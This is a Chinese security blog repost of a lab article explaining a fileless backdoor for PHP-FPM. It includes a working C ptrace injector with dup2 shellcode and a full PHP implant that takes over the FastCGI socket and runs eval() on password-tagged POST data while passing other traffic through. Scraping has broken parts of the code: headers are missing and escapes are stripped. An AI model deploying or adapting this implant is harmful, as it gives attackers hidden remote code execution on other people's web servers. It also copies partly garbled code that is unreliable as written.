system 后门 php,php-fpm环境的一种后门实现

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量433 收藏
点赞数
文章标签: system 后门 php
本文介绍了如何利用PHP-FPM的文件句柄泄露和权限问题,构建一种受限的无文件后门。通过系统调用和进程注入,实现PHP脚本在删除自身后仍能驻留在内存中,接受并处理来自Web服务器的FastCGI请求,执行自定义代码。该方法在特定版本的PHP-FPM中有效,但受到版本限制和重启服务的影响,不具备持久性。文章还讨论了利用的限制和可能的安全问题。
摘要由CSDN通过智能技术生成

163197

作者:imbeee@360观星实验室

简介

目前常见的php后门基本需要文件来维持(常规php脚本后门:一句话、大马等各种变形;WebServer模块:apache扩展等,需要高权限并且需要重启WebServer),或者是脚本运行后删除自身,利用死循环驻留在内存里,不断主动外连获取指令并且执行。两者都无法做到无需高权限、无需重启WeServer、触发后删除脚本自身并驻留内存、无外部进程、能主动发送控制指令触发后门(避免内网无法外连的情况)。

而先前和同事一块测试Linux下面通过/proc/PID/fd文件句柄来利用php文件包含漏洞时,无意中发现了一个有趣的现象。经过后续的分析,可以利用其在特定环境下实现受限的无文件后门,效果见动图:

163197

测试环境

CentOS 7.5.1804 x86_64

nginx + php-fpm(监听在tcp 9000端口)

为了方便观察,建议修改php-fpm默认pool的如下参数:

# /etc/php-fpm.d/www.conf

pm.start_servers = 1

pm.min_spare_servers = 1

pm.max_spare_servers = 1

修改后重启php-fpm,可以看到只有一个master进程和一个worker进程:

[root@localhost php-fpm.d]# ps -ef|grep php-fpm

nginx 2439 30354 0 18:40 ? 00:00:00 php-fpm: pool www

root 30354 1 0 Oct15 ? 00:00:37 php-fpm: master process (/etc/php-fpm.conf)

php-fpm文件句柄泄露

在利用php-fpm运行的php脚本里,使用system()等函数执行外部程序时,由于php-fpm没有使用FD_CLOEXEC处理句柄,导致fork出来的子进程会继承php-fpm进程的所有文件句柄。

简单测试代码:

// t1.php

system("sleep 60");

观察访问前worker进程的文件句柄:

[root@localhost php-fpm.d]# ls -al /proc/2439/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 24 18:54 .

dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:40 ..

lrwx------ 1 nginx nginx 64 Oct 24 18:54 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 24 18:54 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 24 18:54 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 24 18:54 7 -> anon_inode:[eventpoll]

[root@localhost php-fpm.d]#

确定socket:[1168542]为php-fpm监听的9000端口的socket句柄:

[root@localhost php-fpm.d]# lsof -i:9000

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME

php-fpm 2439 nginx 0u IPv4 1168542 0t0 TCP localhost:cslistener (LISTEN)

php-fpm 30354 root 6u IPv4 1168542 0t0 TCP localhost:cslistener (LISTEN)

访问t1.php后,会阻塞在php的system函数调用里,此时查看sleep进程与worker进程的文件句柄:

[root@localhost php-fpm.d]# ps -ef|grep sleep

nginx 2547 2439 0 18:57 ? 00:00:00 sleep 60

[root@localhost php-fpm.d]# ls -al /proc/2547/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 24 18:58 .

dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:57 ..

lrwx------ 1 nginx nginx 64 Oct 24 18:58 0 -> socket:[1168542]

l-wx------ 1 nginx nginx 64 Oct 24 18:58 1 -> pipe:[1408640]

lrwx------ 1 nginx nginx 64 Oct 24 18:58 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 24 18:58 3 -> socket:[1408425]

lrwx------ 1 nginx nginx 64 Oct 24 18:58 7 -> anon_inode:[eventpoll]

[root@localhost php-fpm.d]# ls -al /proc/2439/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 24 18:54 .

dr-xr-xr-x 9 nginx nginx 0 Oct 24 18:40 ..

lrwx------ 1 nginx nginx 64 Oct 24 18:54 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 24 18:54 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 24 18:54 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 24 18:58 3 -> socket:[1408425]

lr-x------ 1 nginx nginx 64 Oct 24 18:58 4 -> pipe:[1408640]

lrwx------ 1 nginx nginx 64 Oct 24 18:54 7 -> anon_inode:[eventpoll]

可以发现请求t1.php后,nginx发起了一个fast-cgi请求到php-fpm进程,即woker进程里3号句柄socket:[1408425]。同时可以看到sleep继承了父进程php-fpm的0 1 2 3 7号句柄,其中的0号句柄也就是php-fpm监听的9000端口的socket句柄。

文件句柄泄露的利用

在子进程里有了继承来的socket句柄,就可以直接使用accept函数直接从该socket接受一个连接。下面是一个用于验证的简单c程序以及调用的php脚本:

// test.c

// gcc -o test test.c

#include

#include

#include

int main(int argc, char *argv[])

{

int sockfd, newsockfd, clilen;

struct sockaddr_in cli_addr;

clilen = sizeof(cli_addr);

sockfd = 0; //直接使用0句柄作为socket句柄

//这里accept会阻塞,接受连接后才会执行system()

newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);

system("/bin/touch /tmp/lol");

return 0;

}

// t2.php

system("/tmp/test");

访问t2.php后,观察php-fpm进程以及子进程状态:

[root@localhost html]# ps -ef|grep php-fpm

nginx 2548 30354 0 Oct24 ? 00:00:00 php-fpm: pool www

nginx 2958 30354 0 11:07 ? 00:00:00 php-fpm: pool www

root 30354 1 0 Oct15 ? 00:00:40 php-fpm: master process (/etc/php-fpm.conf)

[root@localhost html]# ps -ef|grep test

nginx 2957 2548 0 11:07 ? 00:00:00 /tmp/test

[root@localhost html]# strace -p 2548

strace: Process 2548 attached

read(4,

[root@localhost html]# strace -p 2957

strace: Process 2957 attached

accept(0,

[root@localhost html]# strace -p 2958

strace: Process 2958 attached

accept(0,

可以看到php-fpm多了一个worker进程,用于测试的子进程test(pid:2957)阻塞在accept函数,解析t2.php的这个worker进程(pid:2548)阻塞在php的system函数里,系统调用体现为阻塞在read(),即等待system函数返回,因此master进程spawn出新的worker进程来处理正常的fast-cgi请求。此时php-fpm监听在tcp 9000的这个socket句柄上有两个进程在accept等待新的连接,一个是正常的php-fpm worker(pid:2958)进程,另一个是我们的测试程序test。

此时我们请求一个php页面,nginx发起的到9000端口的fast-cgi请求就会有一定几率被我们的test进程accpet接受到。但是我们测试程序test里面没有处理fast-cgi请求,因此nginx直接向前端返回500。查看tmp目录发现生成了lol文件,说明test进程成功通过accept函数从继承来的socket句柄中接受了一个来自nginx的fast-cgi请求。

[root@localhost html]# ls -al /tmp/systemd-private-165040c986624007be902da008f27727-php-fpm.service-6HI0kT/tmp/

total 12

drwxrwxrwt 2 root root 29 Oct 25 11:27 .

drwx------ 3 root root 17 Oct 15 10:40 ..

-rw-r--r-- 1 nginx nginx 0 Oct 25 11:27 lol

-rwxr-xr-x 1 root root 8496 Oct 25 10:42 test

至此,我们利用思路就有了:

php脚本先删除自身,然后用system()等方法运行一个外部程序

外部程序起来后删除自身,驻留在内存里,直接accpet从0句柄接受来自nginx的fast-cgi请求

解析fast-cgi请求,如果含有特定的指令,拦截请求并执行相应的代码,否则认为是正常请求,转发到9000端口让正常的php-fpm worker处理

这个利用思路的不足之处是需要起一个外部的进程。

一个另类的利用方法

到了这里铺垫写完了,进入本文分享的重点部分:如何解决上文提到的需要单独起一个进程来处理fast-cgi请求的不足。

php-fpm解析php脚本,是在php-fpm的worker进程里进行的,也就是说理论上php代码是能访问到worker进程已经打开的文件句柄的。但是php对这块做了封装,在php里通过fopen、socket_create等操作文件、socket时,得到的是一个php resource,每个resource绑定了相应的文件句柄,我们是无法直接操作到文件句柄的。可以通过下面的php脚本简单观察一下:

// t3.php

sleep(10);

$socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP );

sleep(10);

访问t3.php后,查看php-fpm worker进程的文件句柄:

[root@localhost html]# ls -al /proc/2958/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 25 11:16 .

dr-xr-xr-x 9 nginx nginx 0 Oct 25 11:07 ..

lrwx------ 1 nginx nginx 64 Oct 25 11:16 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 11:16 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 11:16 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 12:11 3 -> socket:[1428118]

lrwx------ 1 nginx nginx 64 Oct 25 11:16 7 -> anon_inode:[eventpoll]

[root@localhost html]# ls -al /proc/2958/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 25 11:16 .

dr-xr-xr-x 9 nginx nginx 0 Oct 25 11:07 ..

lrwx------ 1 nginx nginx 64 Oct 25 11:16 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 11:16 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 11:16 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 12:11 3 -> socket:[1428118]

lrwx------ 1 nginx nginx 64 Oct 25 12:11 4 -> socket:[1428132]

lrwx------ 1 nginx nginx 64 Oct 25 11:16 7 -> anon_inode:[eventpoll]

可以看到10秒内只有来自nginx的fast-cgi请求的3号句柄。而10秒后,4号句柄为php脚本中创建的socket,对应php脚本中的$socket资源。

如果我们能在php代码中构造出一个和0号句柄绑定的socket resource,我们就能直接用php的accpet()来处理来自nginx的fast-cgi请求而无需再起一个新的进程。但是翻遍了资料,最后发现php里无法用常规的方式构造指向特定文件句柄的resource。

但是我们发现worker进程在/proc/下面的文件owner并不是root,而是php-fpm的运行用户。这说明了php-fpm的master在fork出worker进程后,没有正确处理其dumpable flag,导致了我们可以用php-fpm worker的运行用户的权限附加到worker上,对其进行操作。

那么我们就有了新的利用思路:

php脚本运行后先删除自身

php脚本里用socket_create()创建一个socket

php脚本释放一个外部程序,使用system()调用,此时子进程继承worker进程的运行权限

子进程attach到父进程(php-fpm worker),向父进程中注入shellcode,使用dup2()系统调用将0号句柄复制到步骤2中所创建的socket对应的句柄号,并恢复worker进程状态后detach,退出

子进程退出后,php代码里已经可以通过我们创建的socket resource来操作0号句柄,对其使用accept获取来自nginx的fast-cgi连接

解析fast-cgi请求,如果含有特定的指令,拦截请求并执行相应的代码,否则认为是正常请求,转发到9000端口让正常的php-fpm worker处理

通过这个利用方法,我们可以将大部分代码都用php实现,并且最终也是以一个被注入过的php-fpm进程的形式存在于服务器上。外部c程序只是用于注入worker进程,复制文件句柄。以下为注入shellcode的c代码:

// dup04.c

// gcc -o dup04 dup04.c

#include

#include

#include

#include

#include

#include

void *freeSpaceAddr(pid_t pid) {

FILE *fp;

char filename[30];

char line[850];

long addr;

char str[20];

char perms[5];

sprintf(filename, "/proc/%d/maps", pid);

fp = fopen(filename, "r");

if(fp == NULL)

exit(1);

while(fgets(line, 850, fp) != NULL)

{

sscanf(line, "%lx-%*lx %s %*s %s %*d", &addr, perms, str);

if(strstr(perms, "x") != NULL)

{

break;

}

}

fclose(fp);

return addr;

}

void ptraceRead(int pid, unsigned long long addr, void *data, int len) {

long word = 0;

int i = 0;

char *ptr = (char *)data;

for (i=0; i < len; i+=sizeof(word), word=0) {

if ((word = ptrace(PTRACE_PEEKTEXT, pid, addr + i, NULL)) == -1) {;

printf("[!] Error reading process memoryn");

exit(1);

}

ptr[i] = word;

}

}

void ptraceWrite(int pid, unsigned long long addr, void *data, int len) {

long word = 0;

int i=0;

for(i=0; i < len; i+=sizeof(word), word=0) {

memcpy(&word, data + i, sizeof(word));

if (ptrace(PTRACE_POKETEXT, pid, addr + i, word) == -1) {;

printf("[!] Error writing to process memoryn");

exit(1);

}

}

}

int main(int argc, char* argv[]) {

void *freeaddr;

//int pid = strtol(argv[1],0,10);

int pid = getppid();

int status;

struct user_regs_struct oldregs, regs;

memset(&oldregs, 0, sizeof(struct user_regs_struct));

memset(&regs, 0, sizeof(struct user_regs_struct));

char shellcode[] = "x90x90x90x90x90x6ax21x58x48x31xffx6ax04x5ex0fx05xcc";

unsigned char *oldcode;

// Attach to the target process

ptrace(PTRACE_ATTACH, pid, NULL, NULL);

waitpid(pid, &status, WUNTRACED);

// Store the current register values for later

ptrace(PTRACE_GETREGS, pid, NULL, &oldregs);

memcpy(&regs, &oldregs, sizeof(struct user_regs_struct));

oldcode = (unsigned char *)malloc(sizeof(shellcode));

// Find a place to write our code to

freeaddr = (void *)freeSpaceAddr(pid) + sizeof(long);

// Read from this addr to back up our code

ptraceRead(pid, (unsigned long long)freeaddr, oldcode, sizeof(shellcode));

// Write our new stub

//ptraceWrite(pid, (unsigned long long)freeaddr, "/tmp/inject.sox00", 16);

//ptraceWrite(pid, (unsigned long long)freeaddr+16, "x90x90x90x90x90x90x90", 8);

ptraceWrite(pid, (unsigned long long)freeaddr, shellcode, sizeof(shellcode));

// Update RIP to point to our code

regs.rip = (unsigned long long)freeaddr + 2;

// Set regs

ptrace(PTRACE_SETREGS, pid, NULL, &regs);

//sleep(5);

// Continue execution

ptrace(PTRACE_CONT, pid, NULL, NULL);

waitpid(pid, &status, WUNTRACED);

// Ensure that we are returned because of our int 0x3 trap

if (WIFSTOPPED(status) && WSTOPSIG(status) == SIGTRAP) {

// Get process registers, indicating if the injection suceeded

ptrace(PTRACE_GETREGS, pid, NULL, &regs);

if (regs.rax != 0x0) {

printf("[*] Syscall for dup2 success.n");

} else {

printf("[!] Library could not be injectedn");

return 0;

}

Now We Restore The Application Back To It's Original State

// Copy old code back to memory

ptraceWrite(pid, (unsigned long long)freeaddr, oldcode, sizeof(shellcode));

// Set registers back to original value

ptrace(PTRACE_SETREGS, pid, NULL, &oldregs);

// Resume execution in original place

ptrace(PTRACE_DETACH, pid, NULL, NULL);

printf("[*] Resume proccess.n");

} else {

printf("[!] Fatal Error: Process stopped for unknown reasonn");

exit(1);

}

return 0;

}

代码中注入的部分参考自网上,shellcode功能很简单,通过syscall调用dup2(0,4),汇编为:

5: 6a 21 pushq $0x21

7: 58 pop %rax

8: 48 31 ff xor %rdi,%rdi

b: 6a 04 pushq $0x4

d: 5e pop %rsi

e: 0f 05 syscall

10: cc int3

使用如下php代码进行注入测试并观察效果:

// t4.php

sleep(10);

$socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP );

sleep(10);

system('/tmp/dup04');

sleep(10);

访问t4.php后查看文件句柄:

[root@localhost html]# ls -al /proc/3022/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 25 16:12 .

dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 ..

lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll]

[root@localhost html]# ls -al /proc/3022/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 25 16:12 .

dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 ..

lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126]

lrwx------ 1 nginx nginx 64 Oct 25 17:59 4 -> socket:[1435131]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll]

[root@localhost html]# ls -al /proc/3022/fd

total 0

dr-x------ 2 nginx nginx 0 Oct 25 16:12 .

dr-xr-xr-x 9 nginx nginx 0 Oct 25 16:12 ..

lrwx------ 1 nginx nginx 64 Oct 25 17:50 0 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 1 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:50 2 -> /dev/null

lrwx------ 1 nginx nginx 64 Oct 25 17:59 3 -> socket:[1428126]

lrwx------ 1 nginx nginx 64 Oct 25 17:59 4 -> socket:[1168542]

lrwx------ 1 nginx nginx 64 Oct 25 17:50 7 -> anon_inode:[eventpoll]

可以看到worker进程在前10秒内只有来自nginx的一个3号句柄;10-20秒多出来的4号句柄socket:[1435131]为php代码中socket_create后创建的socket;20秒后dup4运行结束,dup(0,2)成功调用,0号句柄的socket:[1168542]成功复制到4号句柄。此时php代码中已经可以通过$socket来操作php-fpm监听tcp 9000的socket了。

附上一个简单实现的脚本,通过php来解析fast-cgi并拦截特定请求:

$password = "beedoor";

function dolog($msg) {

file_put_contents('/tmp/log', date('Y-m-d H:i:s') . ' ---- ' . $msg . "n", FILE_APPEND);

}

function readfcgi($socket, $type) {

global $password;

$buffer="";

$postdata="";

while(1) {

dolog("Read 8 bytes header.");

$data = socket_read($socket, 8);

if ($data === "")

return -1;

$buffer .= $data;

dolog(bin2hex($data));

$header = unpack("Cver/Ctype/nid/nlen/Cpadding/Crev", $data);

$body_len = $header["len"] + $header["padding"];

if ($body_len > 0) {

dolog("Read " . $body_len . " bytes body.");

$data = socket_read($socket, $body_len);

if ($data === "")

return -1;

$buffer .= $data;

dolog(bin2hex($data));

if ($header["type"] == 5) {

$postdata .= $data;

dolog("Post data found.");

}

}

if ($header["type"] == $type && $body_len < 65535) {

$stype = $type === 5 ? 'FCGI_STDIN' : 'FCGI_END_REQUEST';

dolog($stype . " finished, braek.");

break;

}

}

//dolog(bin2hex($postdata));

parse_str($postdata, $post_array);

$intercept_flag = array_key_exists($password, $post_array) ? true : false;

if ($intercept_flag)

{

dolog("Password in postdata, intercepted.");

return array("intercept" => true, "buffer" => $postdata);

} else {

dolog("No password, passthrough.");

return array("intercept" => false, "buffer" => $buffer);

}

}

dolog("Init socket rescoure.");

$socket = socket_create( AF_INET, SOCK_STREAM, SOL_TCP );

dolog("dup(0,4);");

system('/tmp/dup04');

dolog("All set, waiting for connections.");

while (1) {

$acpt=socket_accept($socket);

dolog("Incoming connection.");

$buffer = readfcgi($acpt,5);

if ($buffer["intercept"] === true) {

parse_str($buffer["buffer"], $postdata);

$header = "";

$outbuffer = "Content-type: text/htmlrnrn";

ob_clean();

ob_start();

eval($postdata[$password]);

$outbuffer .= ob_get_clean();

dolog("Eval code success.");

$outbuffer_len = strlen($outbuffer);

dolog("Outbuffer length: " . $outbuffer_len . "bytes.");

$slice_len = unpack("n", "x1fxf8");

$slice_len = $slice_len[1];

while ( strlen($outbuffer) > $slice_len ) {

$slice = substr($outbuffer, 0, $slice_len);

$header = pack("C2n2C2", 0x01, 0x06, 1, $slice_len, 0x00, 0x00);

$sent_len = socket_write($acpt, $header, 8);

dolog("Sending " . $sent_len . " bytes slice header.");

dolog(bin2hex($header));

$sent_len = socket_write($acpt, $slice, $slice_len);

dolog("Sending " . $sent_len . " bytes slice.");

dolog(bin2hex($slice));

$outbuffer = substr($outbuffer, $slice_len);

}

$outbuffer_len = strlen($outbuffer);

if ( $outbuffer_len % 8 > 0)

$padding_len = 8 - ($outbuffer_len % 8);

dolog("Processing last slice, outbuffer length: " . $outbuffer_len . " , padding length: " . $padding_len . " bytes.");

$outbuffer .= str_repeat("", $padding_len);

$header = pack("C2n2C2", 0x01, 0x06, 1, $outbuffer_len, $padding_len, 0x00);

$sent_len = socket_write($acpt, $header, 8);

dolog("Sent 8 bytes STDOUT header to webserver.");

dolog(bin2hex($header));

$sent_len = socket_write($acpt, $outbuffer, strlen($outbuffer));

dolog("Sent " . $sent_len . " bytes STDOUT body to webserver.");

dolog(bin2hex($outbuffer));

$header = pack("C2n2C2", 0x01, 0x03, 1, 8, 0x00, 0x00);

$endbody = pack("C8", 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0);

$sent_len = socket_write($acpt, $header, 8);

dolog("Sent 8 bytes REQUEST_END header to webserver.");

dolog(bin2hex($header));

$sent_len = socket_write($acpt, $endbody, 8);

dolog("Sent 8 bytes REQUEST_END body to webserver.");

dolog(bin2hex($endbody));

socket_shutdown($acpt);

continue;

} else {

$buffer = $buffer["buffer"];

}

dolog("The full buffer size is " . strlen($buffer) . " bytes.");

$fpm_socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

if ($fpm_socket === false) {

dolog("Create socket for real php-fpm failed.");

socket_close($acpt);

}

if (socket_connect($fpm_socket, "127.0.0.1", 9000) === false) {

dolog("Connect to real php-fpm failed.");

socket_close($acpt);

}

dolog("Connected to real php-fpm.");

$sent_len = socket_write($fpm_socket, $buffer, strlen($buffer));

dolog("Sent " . $sent_len . " to real php-fpm.");

$buffer = readfcgi($fpm_socket, 3);

//TODO: intercept real output

$buffer = $buffer["buffer"];

dolog("Recieved " . strlen($buffer) . " from real php-fpm.");

socket_close($fpm_socket);

$sent_len = socket_write($acpt, $buffer);

dolog("Sent " . $sent_len . " bytes back to webserver.");

socket_shutdown($acpt);

dolog("Shutdown connection from webserver.");

}

利用限制

上面给出的php实现,利用的前提是Linux下的php-fpm环境,同时有php版本限制,需5.x<5.6.35,7.0.x<7.0.29,7.1.x<7.1.16,7.2.x<7.2.4。因为利用到的两个前提条件中,worker进程未正确设置dumpable flag这个问题已经在CVE-2018-10545中修复,详情请自行查阅。而另一个条件,在php中通过system等函数来调用第三方程序时未正确处理文件描述符的问题,也已经提交给php官方,但php官方认为未能导致安全问题,不予处理。所以截止目前为止,最新版本的php-fpm都存在文件描述符泄露的问题。

总结

本文分享了一种php-fpm的另类后门实现,但比较受限。该方法虽然实现了无文件、无进程、能主动触发等特性,但是无法实现持续化,php-fpm服务重启后即失效;同时由于生产环境中php-fpm的worker进程众多,fast-cgi请求能被我们accept接受到的几率也比较小,不能稳定的触发。仅希望本文能抛砖引玉,引起大家对该问题进行更深入的探讨。如文中存在描述不准确的地方,欢迎大家批评指正。

当然如果你愿意同我们一起进行安全技术的研究和探索,请发送简历到 lab@360.net,我们期望你的加入。

芈十四
关注
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 353
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 865
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
system 后门 php,PHP后门隐藏
weixin_36195837的博客
03-10 172
来源:amxku blog首先建立一PHP文件test.php 文件内容为:$test=$_GET['test'];@include 'test/'.$test;?>Txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?t...
FPM 安装
weixin_30846599的博客
09-25 348
allow_call_time_pass_reference 不被支持 (5.4) register_long_arrays 不被支持 (5.4) 1. 下载:http://us1.php.net/downloads.phphttp://cn2.php.net/distributions/php-5.3.28.tar.gz 2. 安装依赖:yum install gcc gcc-c++ ...
php超强后门在任意位置创建文件,利用PHP的.user.ini设置文件建造后门
weixin_33617670的博客
03-09 294
0x00 配景这个预计许多同学看了不屑,认为是烂大街的对象了:.htaccess文件组成的PHP后门那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个要领。我的nginx处事器全部是fpm/fastcgi,我的IISphp5.3以上的全部用的fastcgi/cgi,我win下的apache上也...
那些强悍的PHP一句话后门
zhangge3663的博客
03-14 897
强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><hea...
攻防世界Web:Web_php_wrong_nginx_config
Light_inthe_eyes的博客
11-03 2034
首先进来是一个登录页面: 通过御剑扫描,发现了robots.txt,打开发现两个php文件: hint.php: Hack.php是跳转到登录页面: 抓包看看Hack.php,发现了可疑的点Cookie:isLogin=0,不妨修改为1,进入控制中心: 发现url中file=index&ext=php,不妨测试一下../,发现这里过滤了../: 绕过../,根据hint.php可以知道配置文件的路径,那就构造payload:file=....//....//....//....//etc/nginx
攻防世界 web高手进阶区 7分题 Web_php_wrong_nginx_config
闵行小鱼塘
08-04 1974
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是Web_php_wrong_nginx_config的writeup
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1286
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
网站渗透思路
bluemoon_0的博客
03-16 508
网站渗透思路
php中的依赖注入
koastal的博客
08-10 903
依赖注入是一种允许我们从硬编码的依赖中解耦出来,从而在运行时或者编译时能够修改的软件设计模式。 我到现在依然不大明白上面“依赖注入”的定义是什么,有兴趣可以参考下《PHP之道》上面对“依赖注入”的 解释。 http://laravel-china.github.io/php-the-right-way/#dependency_injection简而言之就是可以让我们在类的方法中更加方便的调用与之关
FPM 在ubuntu下安装
wiwa@tech
01-26 2762
安装命令: sudo apt-get update sudo apt-get install ruby-dev build-essential sudo gem install fpm 以下为原文: How To Use FPM To Easily Create Packages in Multiple Formats PostedAugust 5,
linux系统使用fpm对kong进行快速打包部署
u012821124的博客
11-19 357
Linux目前安装软件的方式大致有以下几种:源码安装、yum安装、deb安装(基于Debian的系统使用deb格式的包如ubuntu)、Rpm安装 (基于Red hat)。其中Rpm安装相对来说是最方便快捷而且全自动的安装方式。本文将介绍如果将我们编写或者修改的源码用rpm进行打包。首先要提到的是rpmbuild这个工具,这个工具我之前也提到过,可以生成rpm包,但是需要编写spec文件,上手麻烦。而本文提到的Fpm,是一种比较快速制作rpm包的工具,比起rpmbuild要方便很多。 Fpm支持的源类型包:
php strace 工具,故障排查工具-strace,tcpdump的简单使用
weixin_35965498的博客
03-28 242
进程相关定位进程top //查看进程占用资源 cpu,memps -aux|grep php-fpm //查看php-fpm相关进程分析进程[root@izwz97ww79qca7m2kxb6hqz ~]# ll /proc/28770/fd //查看进程28770中所有操作的文件fdtotal 0lrwx------ 1 root root 64 Jul 20 16:56 0 ->...
命令执行漏洞学习
weixin_47306547的博客
09-14 2851
目录 命令执行漏洞简介 命令执行漏洞成因 命令执行漏洞危害 PHP中可以调用外部程序常见函数 1)system() 2) passthru() 3) exec() 4)shell_exec() 5)执行运算符(反引号 `) 6)popen() 7) proc_open() 命令执行漏洞简介 应用程序有时需要调用一些执行系统命令的函数,如在php中,使用system、exec、shell_exec\passthru、popen、proc_popen等函数可以执行系统命令。当黑客.
设置环境变量
十年磨一剑,霜刃未曾试!
08-01 883
我们可以设置一个用户环境变量,例如,输入:set hosts=c:\windows\system32\drivers\etc回车,我们再用set回车列出当前系统环境变量和用户环境变量,可以发现hosts环境变量也在其中,表示我们成功设置了该变量。我们此时可以在cmd中输入:cd %hosts%回车,就可以进入c:\windows\system32\drivers\etc目录下
php system函数用法,system函数如何使用?总结system函数实例用法
weixin_29982199的博客
03-20 4703
这篇文章主要简单分析了linux下system函数,具有一定的参考价值,感兴趣的小伙伴们可以参考一下简单分析了linux下system函数的相关内容,具体内容如下intlibc_system (const char *line){if (line == NULL)/* Check that we have a command processor available. It mightnot be ...
php删除自身文件,php如何删除自己
weixin_42636454的博客
03-10 344
php删除自己的方法:首先创建一个PHP示例文件;然后通过【if (file_exists($file)) {@unlink ($file); }】方法实现删除自己即可。其实asp和php删除自身的代码z.asp代码如下:s= Server.MapPath("z.asp")Set fso = CreateObject("Scripting.FileSystemObject")If fso.File...
PHP event 事件机制
weixin_30384031的博客
07-25 319
<?php /* * PHP 事件机制 */ class baseClass{ private $_e; public function __set($name,$value){ if( strncasecmp($name,"on",2) === 0 ){ if(!isset($this->...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值